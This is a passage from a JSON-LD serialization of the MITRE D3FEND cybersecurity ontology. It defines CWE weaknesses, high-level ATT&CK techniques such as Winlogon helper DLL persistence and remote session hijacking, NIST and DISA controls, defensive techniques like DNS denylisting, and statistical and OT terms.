    {
      "@id": "_:N9a3d6628c39844a28e446c640e0403b1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GNSSSignal"
      }
    },
    {
      "@id": "d3f:CCI-000213_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces approved authorizations for logical access to information and system resources in accordance with applicable access control policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000213"
    },
    {
      "@id": "d3f:CWE-24",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-24",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"../\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '../filedir'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:FPGABitstream",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A binary configuration file generated by synthesizing and placing-and-routing an HDL design, which is loaded into a Field-Programmable Gate Array (FPGA) to physically define its internal logic, interconnects, and I/O behavior. Rather than being executed by a processor, it programs the device itself.",
      "rdfs:label": "FPGA Bitstream",
      "rdfs:seeAlso": {
        "@id": "dbr:Bitstream"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfigurationFile"
      }
    },
    {
      "@id": "d3f:OWL",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-OWL",
      "d3f:definition": "The Web Ontology Language (OWL) is a family of knowledge representation languages for authoring ontologies.",
      "d3f:kb-article": "## How it works\nOntologies are a formal way to describe taxonomies and classification networks, essentially defining the structure of knowledge for various domains: the nouns representing classes of objects and the verbs representing relations between the objects.\n\nThe OWL languages are characterized by formal semantics. They are built upon the World Wide Web Consortium's (W3C) standard for objects called the Resource Description Framework (RDF). OWL classes correspond to description logic (DL) _concepts_.  OWL properties to DL _roles_, and individuals are named the same way in OWL and other DLs.\n\n## References\n1. Web Ontology Language. (2023, April 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Web_Ontology_Language)",
      "d3f:synonym": "Web Ontology Language",
      "rdfs:label": "OWL",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptionLogic"
      }
    },
    {
      "@id": "d3f:T0886",
      "@type": "owl:Class",
      "d3f:attack-id": "T0886",
      "d3f:definition": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019)",
      "rdfs:label": "Remote Services - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSInitialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        }
      ],
      "skos:prefLabel": "Remote Services"
    },
    {
      "@id": "d3f:CWE-178",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-178",
      "d3f:definition": "The product does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results.",
      "rdfs:label": "Improper Handling of Case Sensitivity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:implements",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x implements y: The entity x realizes entity y by putting its design or specification into effect.",
      "rdfs:label": "implements",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:OperatingSystemSharedLibraryFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system shared library file is a shared library file that is part of the operating system and that incorporates common operating system code for use by any application or to provide operating system services.",
      "rdfs:label": "Operating System Shared Library File",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/Library_(computing)#Shared_libraries"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemFile"
        },
        {
          "@id": "d3f:SharedLibraryFile"
        }
      ]
    },
    {
      "@id": "d3f:Reference-AutorunDifferences_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-01-002/"
      },
      "d3f:kb-abstract": "The Sysinternals tool Autoruns checks the registry and file system for known identify persistence mechanisms. It will output any tools identified, including built-in or added-on Microsoft functionality and third party software. Many of these locations are known by adversaries and used to obtain Persistence. Running Autoruns periodically in an environment makes it possible to collect and monitor its output for differences, which may include the removal or addition of persistent tools. Depending on the persistence mechanism and location, legitimate software may be more likely to make changes than an adversary tool. Thus, this analytic may result in significant noise in a highly dynamic environment. While Autoruns is a convenient method to scan for programs using persistence mechanisms its scanning nature does not conform well to streaming based analytics. This analytic could be replaced with one that draws from sensors that collect registry and file information if streaming analytics are desired.\n\nUtilizes the Sysinternals autoruns tool (ignoring validated Microsoft entries). Primarily not a detection analytic by itself but through analysis of results by an analyst can be used for such. Building another analytic on top of this one identifying unusual entries would likely be a beneficial alternative.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemFileAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-01-002: Autorun Differences",
      "rdfs:label": "Reference - CAR-2013-01-002: Autorun Differences - MITRE"
    },
    {
      "@id": "d3f:ContentPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A set of rules and guidelines that dictate the acceptable use, distribution, and management of digital content within a system or platform. It defines what content is allowed, restricted, or prohibited, ensuring compliance with legal, ethical, and organizational standards.",
      "rdfs:label": "Content Policy",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:T1547.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.004",
      "d3f:definition": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Winlogon Helper DLL",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Nd64ea3c03aad4192afa4f85f57bb7c16"
        }
      ]
    },
    {
      "@id": "_:Nd64ea3c03aad4192afa4f85f57bb7c16",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:OTActuator",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OT actuator is an industrial-grade actuator optimized for operational technology (OT) environments, such as SCADA or process-control systems. It tolerates harsher conditions, meets stricter safety and reliability standards, and integrates seamlessly with ICS protocols to enable real-time mechanical motion or adjustments in production lines and critical infrastructure.",
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.gov/glossary/term/actuator"
      },
      "rdfs:label": "OT Actuator",
      "rdfs:subClassOf": {
        "@id": "d3f:Actuator"
      }
    },
    {
      "@id": "d3f:T1563",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:RemoteSession"
      },
      "d3f:attack-id": "T1563",
      "d3f:definition": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.",
      "d3f:produces": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      },
      "rdfs:label": "Remote Service Session Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:Neb926b819efb457a9c1c52cf3e74494b"
        },
        {
          "@id": "_:Nac9d367504a1453fbb7daa7e9ee6be28"
        }
      ]
    },
    {
      "@id": "_:Neb926b819efb457a9c1c52cf3e74494b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemoteSession"
      }
    },
    {
      "@id": "_:Nac9d367504a1453fbb7daa7e9ee6be28",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-512",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-512",
      "d3f:definition": "The product collects personally identifiable information about a human user or the user's activities, but the product accesses this information using other resources besides itself, and it does not require that user's explicit approval or direct input into the product.",
      "rdfs:label": "Spyware",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-506"
      }
    },
    {
      "@id": "d3f:StyleGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-STY",
      "d3f:definition": "Successor to the ProGAN.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). StyleGAN. [Link](https://en.wikipedia.org/wiki/StyleGAN)",
      "d3f:synonym": "Style GAN",
      "rdfs:label": "StyleGAN",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageSynthesisGAN"
      }
    },
    {
      "@id": "d3f:UserAccountDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account is disabled, preventing its active use within the system.",
      "rdfs:label": "User Account Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N0b969b65552144328e62bdd9c1e724b1"
        }
      ]
    },
    {
      "@id": "_:N0b969b65552144328e62bdd9c1e724b1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountEnableEvent"
      }
    },
    {
      "@id": "d3f:T1568",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1568",
      "d3f:definition": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "rdfs:label": "Dynamic Resolution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N39a540e89d884659a5adf3ff1f0cedb7"
        }
      ]
    },
    {
      "@id": "_:N39a540e89d884659a5adf3ff1f0cedb7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:CWE-523",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-523",
      "d3f:definition": "Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server.",
      "rdfs:label": "Unprotected Transport of Credentials",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:T1160",
      "@type": "owl:Class",
      "d3f:attack-id": "T1160",
      "d3f:definition": "Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.004",
      "rdfs:label": "Launch Daemon",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1082",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1082",
      "d3f:definition": "The code contains a class instance that calls the method or function to delete or destroy itself.",
      "rdfs:label": "Class Instance Self Destruction Control Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:T1070.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070.009",
      "d3f:definition": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)",
      "rdfs:label": "Clear Persistence",
      "rdfs:subClassOf": {
        "@id": "d3f:T1070"
      }
    },
    {
      "@id": "d3f:PowerShellProfileScript",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A PowerShell profile script is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.",
      "rdfs:label": "PowerShell Profile Script",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.1"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserInitScript"
      }
    },
    {
      "@id": "d3f:CCI-001677_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:MessageAuthentication"
        },
        {
          "@id": "d3f:SenderMTAReputationAnalysis"
        },
        {
          "@id": "d3f:SenderReputationAnalysis"
        },
        {
          "@id": "d3f:TransferAgentAuthentication"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs spam protection mechanisms at workstations, servers, or mobile computing devices on the network to detect and take action on unsolicited messages transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001677"
    },
    {
      "@id": "d3f:OTErrorMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "An anticipated, reproducible defect occurred within the system.",
      "rdfs:label": "OT Error Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDiagnosticsMessageEvent"
        },
        {
          "@id": "_:N2d2d13a3aca840bd8e16660f8d8ab994"
        }
      ]
    },
    {
      "@id": "_:N2d2d13a3aca840bd8e16660f8d8ab994",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTErrorMessage"
      }
    },
    {
      "@id": "d3f:CWE-1077",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1077",
      "d3f:definition": "The code performs a comparison such as an equality test between two float (floating point) values, but it uses comparison operators that do not account for the possibility of loss of precision.",
      "rdfs:label": "Floating Point Comparison with Incorrect Operator",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:T1073",
      "@type": "owl:Class",
      "d3f:attack-id": "T1073",
      "d3f:definition": "Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.002",
      "rdfs:label": "DLL Side-Loading",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:Reference-S7-1200-Programmable-controller",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.tia.siemens.cloud/r/simatic_s7_1200_manual_collection_enus_20/programming-concepts/using-blocks-to-structure-your-program/data-block-db"
      },
      "d3f:kb-abstract": "The S7-1200 programmable logic controllers (PLCs) can control a variety of automation applications. Compact design, affordable price, and a powerful instruction set make the S7-1200 CPU and modules a perfect solution for controlling a wide variety of applications. Together with the STEP 7 configuration and programming tool, you have the flexibility you need to design your automation solutions. This documentation provides information about the S7-1200 CPU and modules. It contains information for engineers, programmers, installers, and electricians.",
      "d3f:kb-organization": "SIEMENS",
      "d3f:kb-reference-of": {
        "@id": "d3f:OTVariableAccessRestriction"
      },
      "d3f:kb-reference-title": "S7-1200 Programmable controller",
      "rdfs:label": "Reference - S7-1200 Programmable controller"
    },
    {
      "@id": "d3f:StackSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:StackFrame"
      },
      "d3f:definition": "The stack segment contains the program stack, a last-in-first-out structure, typically allocated in the higher parts of memory for the process.",
      "rdfs:label": "Stack Segment",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Call_stack"
        },
        {
          "@id": "http://dbpedia.org/resource/Data_segment#Stack"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessSegment"
        },
        {
          "@id": "_:N846c1f7716c743fea81d3a65f496a83e"
        }
      ]
    },
    {
      "@id": "_:N846c1f7716c743fea81d3a65f496a83e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTSP800-53ControlCatalog"
      ],
      "d3f:archived-at": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2013-04-30"
      },
      "d3f:version": 4,
      "rdfs:label": "NIST SP 800-53 R4",
      "rdfs:seeAlso": {
        "@id": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-4/archive/2015-01-22"
      }
    },
    {
      "@id": "d3f:WindowsNtDeleteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Deletes the specified file.",
      "rdfs:label": "Windows NtDeleteFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIDeleteFile"
      }
    },
    {
      "@id": "d3f:GroupCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a new group is established within the system, defining an entity to manage users and permissions collectively.",
      "rdfs:label": "Group Creation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:GroupManagementEvent"
      }
    },
    {
      "@id": "d3f:DNSDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DNSDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:DNSNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-DNSDL",
      "d3f:definition": "Blocking DNS Network Traffic based on criteria such as IP address, domain name, or DNS query type.",
      "d3f:kb-article": "## How it works\nRules are implemented that filter DNS queries using criteria such as:\n- Client subnet\n- Type of network protocol used in query\n- Fully qualified domain name (FQDN) of record in the query\n- DNS Server IP address that received the DNS request\n- Type of DNS record being queried\n- Time of day the query is received\n- Size of the response\n\nFor example, a DNS policy can be created for blocking DNS queries for FQDNs that have been identified as unauthorized.\n\n## Considerations\n- Implementation considerations for DNS filtering policies to avoid over-blocking or under-blocking domains.\n- Continuous maintenance of unauthorized domain lists is needed to keep up to date with possible site content changes.\n- File sharing or content delivery networks may require other filtering techniques that are more fine-grained (URL blocking).\n- Access to malicious websites or other network resources directly by IP instead of by DNS record, or after alteration of local DNS hosts file, may not result in DNS network traffic.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "DNS Blacklisting",
      "rdfs:label": "DNS Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N5cc88bc9b2c84e9fb5d6c97ea49ae97c"
        }
      ]
    },
    {
      "@id": "_:N5cc88bc9b2c84e9fb5d6c97ea49ae97c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSNetworkTraffic"
      }
    },
    {
      "@id": "d3f:WindowsNtSuspendThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtSuspendThread",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendThread"
      }
    },
    {
      "@id": "d3f:InternetFileTransferTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Internet file transfer network traffic is network traffic related to file transfers between network nodes that crosses a boundary between networks. This includes only network traffic conforming to standard file transfer protocols, not custom transfer protocols.",
      "rdfs:label": "Internet File Transfer Traffic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileTransferNetworkTraffic"
        },
        {
          "@id": "d3f:InternetNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:MedianAbsoluteDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MAD",
      "d3f:definition": "The median absolute deviation (also MAD) is the median of the absolute deviation from the median.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Average absolute deviation. [Link](https://en.wikipedia.org/wiki/Average_absolute_deviation)",
      "rdfs:label": "Median Absolute Deviation",
      "rdfs:subClassOf": {
        "@id": "d3f:AverageAbsoluteDeviation"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:control-name": "Least Privilege",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-6"
    },
    {
      "@id": "d3f:StandardDeviation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SD",
      "d3f:definition": "The standard deviation is a measure of the amount of variation or dispersion of a set of values.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Standard deviation. [Link](https://en.wikipedia.org/wiki/Standard_deviation)",
      "d3f:synonym": "SD",
      "rdfs:label": "Standard Deviation",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:T1587.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587.002",
      "d3f:definition": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.",
      "rdfs:label": "Code Signing Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1587"
      }
    },
    {
      "@id": "d3f:CCI-002630_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ScriptExecutionAnalysis"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system detects organization-defined unauthorized operating system commands through the kernel application programming interface at organization-defined information system hardware components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002630"
    },
    {
      "@id": "d3f:DNSRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Domain Name System (DNS) record is a record of information returned to clients seeking to find computers, services, and other resources connected to the Internet or a private network.  Record information is stored on a domain name server so it can respond to DNS queries from clients.There are a variety of record types, depending on the client's information needs. Common types include Start of Authority, IP addresses, SMTP mail exchangers, name servers, reverse DNS lookup pointers, etc.",
      "rdfs:label": "DNS Record",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Domain_Name_System"
        },
        {
          "@id": "dbr:List_of_DNS_record_types"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:CCI-000060_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system conceals, via the session lock, information previously visible on the display with a publicly viewable image.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-19T00:00:00"
      },
      "rdfs:label": "CCI-000060"
    },
    {
      "@id": "d3f:OTTimeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Read, set, or calculate timing mechanisms.",
      "rdfs:label": "OT Time Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:N1eed4d8b6bc448a7be651b6e4cb749e7"
        }
      ]
    },
    {
      "@id": "_:N1eed4d8b6bc448a7be651b6e4cb749e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTTimeCommand"
      }
    },
    {
      "@id": "d3f:OTProcessDataHistorian",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:TimeSeriesDatabase"
      },
      "d3f:definition": "A system used to collect and store data, including telemetry, events, alerts, and alarms about the operational process and supporting devices.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Operational_historian"
      },
      "rdfs:label": "OT Process Data Historian",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Application"
        },
        {
          "@id": "_:N1d0a7bdb53d44b54961a3de3fadb60d5"
        }
      ]
    },
    {
      "@id": "_:N1d0a7bdb53d44b54961a3de3fadb60d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TimeSeriesDatabase"
      }
    },
    {
      "@id": "d3f:WeightedMean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-WM",
      "d3f:definition": "A mean that incorporates weighting to certain data elements.",
      "d3f:kb-article": "## Considerations\nThe arithmetic mean, geometric mean, and harmonic mean can all be weighted.\n\n## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Weighted Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:EXF-0002.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.03",
      "d3f:definition": "In a terrestrial environment, threat actors use traffic analysis attacks to analyze traffic flow to gather topological information. This traffic flow can divulge information about critical nodes, such as the aggregator node in a sensor network. In the space environment, specifically with relays and constellations, traffic analysis can be used to understand the energy capacity of spacecraft node and the fact that the transceiver component of a spacecraft node consumes the most power. The spacecraft nodes in a constellation network limit the use of the transceiver to transmit or receive information either at a regulated time interval or only when an event has been detected. This generally results in an architecture comprising some aggregator spacecraft nodes within a constellation network. These spacecraft aggregator nodes are the sensor nodes whose primary purpose is to relay transmissions from nodes toward the ground station in an efficient manner, instead of monitoring events like a normal node. The added functionality of acting as a hub for information gathering and preprocessing before relaying makes aggregator nodes an attractive target to side channel attacks. A possible side channel attack could be as simple as monitoring the occurrences and duration of computing activities at an aggregator node. If a node is frequently in active states (instead of idle states), there is high probability that the node is an aggregator node and also there is a high probability that the communication with the node is valid. Such leakage of information is highly undesirable because the leaked information could be strategically used by threat actors in the accumulation phase of an attack.",
